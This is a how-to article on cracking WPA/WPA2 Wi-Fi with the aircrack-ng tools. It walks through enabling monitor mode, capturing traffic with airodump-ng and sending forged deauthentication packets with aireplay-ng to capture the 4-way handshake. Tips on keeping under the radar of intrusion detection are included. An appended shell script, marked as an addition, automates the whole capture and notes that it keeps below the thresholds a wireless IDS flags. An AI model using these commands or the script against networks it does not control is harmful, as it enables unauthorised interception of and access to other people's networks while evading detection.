Wireless How To

How To Crack WPA / WPA2

Brandon Teska, January 15, 2008
Active Attack

Using the information we gathered with Kismet during the recon step, we can target the associated clients of a chosen AP with forged deauthentication packets, which should cause the client to drop its association with the AP. We then listen for the reassociation and the WPA 4-way handshake that follows it. This is a little trickier and also detectable, since we're sending out packets, but it's much quicker than waiting for a genuine association (in most cases).

After identifying our target AP with associated clients, we need to set up the wireless hardware for packet injection. The aircrack suite has a little shell script, airmon-ng, to do just that. First bring down the managed VAP (Virtual Access Point) with:

airmon-ng stop ath0

Figure 2: Bringing down the managed interface

Next, start up a VAP in "Monitor" mode on the physical device:

airmon-ng start wifi0

Figure 3: Creating a monitor mode interface

Now we need to simultaneously deauthenticate a client and capture the resulting reauthentication. Open up two terminal windows. Start airodump-ng in one terminal:

General Form: airodump-ng -w capture_file_prefix --channel channel_number interface
Example: airodump-ng -w cap --channel 6 ath0

Figure 4: airodump-ng, up and running

Note: You can check which interface is in monitor mode by using iwconfig.

Next, run the deauthentication attack with aireplay-ng in the other terminal:

General Form: aireplay-ng --deauth 1 -a MAC_of_AP -c MAC_of_client interface
Example: aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0

Figure 5: A successfully sent deauthentication packet

If all goes well, the client will be deauthenticated from the AP and will usually reauthenticate right away. I like to keep the number of deauthentication packets sent to a minimum (one, in this case). This helps keep you under the radar, since programs like Kismet can detect deauthentication floods. If the deauthentication was successful, airodump-ng displays a notification of the captured WPA handshake (boxed in red in Figure 6).
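The whole sequence above, as an added example that is not part of the original article, wrapped in a POSIX shell script: it validates the two MAC addresses, confirms that the interface really is in monitor mode by parsing iwconfig output (the check suggested in the note above), runs airodump-ng pinned to the target BSSID and channel, injects a single deauthentication frame, and then tests the capture file for a handshake. The interface names (wifi0, ath0), the capture prefix and the fixed sleep intervals are assumptions taken from the article's madwifi setup; the airodump-ng --bssid filter and the aircrack-ng "WPA (n handshake)" listing used for the final check are features of the aircrack-ng suite that the article does not show. The sample iwconfig output used for the self-check is constructed, not captured from a real system.

```shell
#!/bin/sh
# Added example, not code from the original article. Captures the WPA
# 4-way handshake with one targeted deauthentication, as described in
# the article. Needs the aircrack-ng suite and root; interface names
# (wifi0 physical device, ath0 monitor VAP) follow the madwifi layout
# the article uses and are assumptions.

# Fail early on a malformed MAC instead of letting aireplay-ng reject it
# part-way through the attack.
valid_mac() {
    printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Print the names of interfaces that iwconfig reports in monitor mode.
# Reads iwconfig output on stdin so it can be tested against saved text.
# Interface names start in column one; continuation lines are indented.
monitor_ifaces() {
    awk '/^[^ ]/ { iface = $1 } /Mode:Monitor/ { print iface }'
}

# Constructed iwconfig output for the self-check below (not real output).
SAMPLE_IWCONFIG='wifi0     no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.437 GHz  Access Point: 00:00:00:00:00:00
          Bit Rate:0 kb/s   Tx-Power:16 dBm   Sensitivity=1/1

eth0      no wireless extensions.
'

# capture_handshake AP_MAC CLIENT_MAC CHANNEL [MONITOR_IFACE] [PREFIX]
capture_handshake() {
    ap="$1"; client="$2"; channel="$3"
    iface="${4:-ath0}"; prefix="${5:-cap}"

    valid_mac "$ap" && valid_mac "$client" || {
        echo "malformed MAC address" >&2; return 2; }

    # Tear down the managed VAP and create a monitor-mode VAP on the
    # physical madwifi device, exactly as in the article.
    airmon-ng stop "$iface" >/dev/null
    airmon-ng start wifi0 >/dev/null
    iwconfig 2>/dev/null | monitor_ifaces | grep -qx "$iface" || {
        echo "$iface is not in monitor mode" >&2; return 3; }

    # Capture only the target AP on its channel; airodump-ng writes
    # <prefix>-01.cap (the number increments if the file already exists).
    airodump-ng --bssid "$ap" --channel "$channel" -w "$prefix" "$iface" \
        >/dev/null 2>&1 &
    dump_pid=$!
    sleep 3

    # A single deauth frame is usually enough to force a reassociation
    # and stays below the flood thresholds tools like Kismet watch for.
    aireplay-ng --deauth 1 -a "$ap" -c "$client" "$iface"

    # Leave the capture running long enough for the client to come back.
    sleep 10
    kill "$dump_pid"
    wait "$dump_pid" 2>/dev/null

    capfile="${prefix}-01.cap"
    # aircrack-ng lists each BSSID in the capture with its encryption and,
    # for WPA, how many handshakes it found, e.g. "WPA (1 handshake)".
    if aircrack-ng "$capfile" </dev/null 2>/dev/null \
        | grep -q 'WPA ([1-9][0-9]* handshake'; then
        echo "handshake captured in $capfile"
    else
        echo "no handshake in $capfile; retry or raise the deauth count" >&2
        return 1
    fi
}

# Usage: sh capture.sh 00:18:E7:02:4C:E6 00:13:CE:21:54:14 6
if [ $# -ge 3 ]; then
    capture_handshake "$@"
fi
```

The deauth count is deliberately fixed at one; if the client does not come back within the capture window, rerun the script rather than flooding, since a burst of deauthentication frames is exactly what a wireless IDS flags.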
Figure 6: Successful WPA handshake capture

Tags: Hacking, How To, WiFi, WPA